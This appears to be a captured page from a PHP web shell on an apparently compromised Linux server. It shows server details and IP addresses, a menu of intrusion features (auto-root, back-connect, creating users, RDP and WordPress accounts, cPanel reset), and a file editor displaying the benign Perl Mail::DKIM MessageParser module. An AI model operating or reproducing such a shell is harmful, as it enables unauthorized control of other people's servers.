Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
Mail /
DKIM /
[ HOME SHELL ]
Name
Size
Permission
Action
Algorithm
[ DIR ]
drwxr-xr-x
Canonicalization
[ DIR ]
drwxr-xr-x
AuthorDomainPolicy.pm
7.74
KB
-rw-r--r--
Common.pm
3.52
KB
-rw-r--r--
DNS.pm
2.69
KB
-rw-r--r--
DkPolicy.pm
6.66
KB
-rw-r--r--
DkSignature.pm
8.75
KB
-rw-r--r--
DkimPolicy.pm
7.14
KB
-rw-r--r--
Key.pm
1.64
KB
-rw-r--r--
KeyValueList.pm
4.19
KB
-rw-r--r--
MessageParser.pm
2.13
KB
-rw-r--r--
Policy.pm
5.57
KB
-rw-r--r--
PrivateKey.pm
3.82
KB
-rw-r--r--
PublicKey.pm
9.85
KB
-rw-r--r--
Signature.pm
20.51
KB
-rw-r--r--
Signer.pm
16.26
KB
-rw-r--r--
SignerPolicy.pm
2.81
KB
-rw-r--r--
TextWrap.pm
7.04
KB
-rw-r--r--
Verifier.pm
21.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MessageParser.pm
#!/usr/bin/perl # Copyright 2005 Messiah College. All rights reserved. # Jason Long <jlong@messiah.edu> # Copyright (c) 2004 Anthony D. Urso. All rights reserved. # This program is free software; you can redistribute it and/or # modify it under the same terms as Perl itself. use strict; use warnings; package Mail::DKIM::MessageParser; use Carp; sub new_object { my $class = shift; return $class->TIEHANDLE(@_); } sub new_handle { my $class = shift; local *TMP; tie *TMP, $class, @_; return *TMP; } sub TIEHANDLE { my $class = shift; my %args = @_; my $self = bless \%args, $class; $self->init; return $self; } sub init { my $self = shift; $self->{in_header} = 1; $self->{buf} = ""; } sub PRINT { my $self = shift; my $buf = $self->{buf}; $buf .= @_ == 1 ? $_[0] : join("", @_) if @_; if ($self->{in_header}) { while (length $buf) { if (substr($buf,0,2) eq "\015\012") { $buf = substr($buf, 2); $self->finish_header(); $self->{in_header} = 0; last; } if ($buf !~ /^(.+?\015\012)[^\ \t]/s) { last; } my $header = $1; $self->add_header($header); $buf = substr($buf, length($header)); } } if (!$self->{in_header}) { my $j = rindex($buf,"\015\012"); if ($j >= 0) { $self->add_body(substr($buf, 0, $j+2)); substr($buf, 0, $j+2) = ''; } } $self->{buf} = $buf; return 1; } sub CLOSE { my $self = shift; my $buf = $self->{buf}; if ($self->{in_header}) { if (length $buf) { # A line of header text ending CRLF would not have been # processed yet since before we couldn't tell if it was # the complete header. Now that we're in CLOSE, we can # finish the header... $buf =~ s/\015\012$//s; $self->add_header("$buf\015\012"); } $self->finish_header; $self->{in_header} = 0; } else { if (length $buf) { $self->add_body($buf); } } $self->{buf} = ""; $self->finish_body; return 1; } sub add_header { die "add_header not implemented"; } sub finish_header { die "finish_header not implemented"; } sub add_body { die "add_body not implemented"; } sub finish_body { # do nothing by default } sub reset { carp "reset not implemented"; } 1;
Close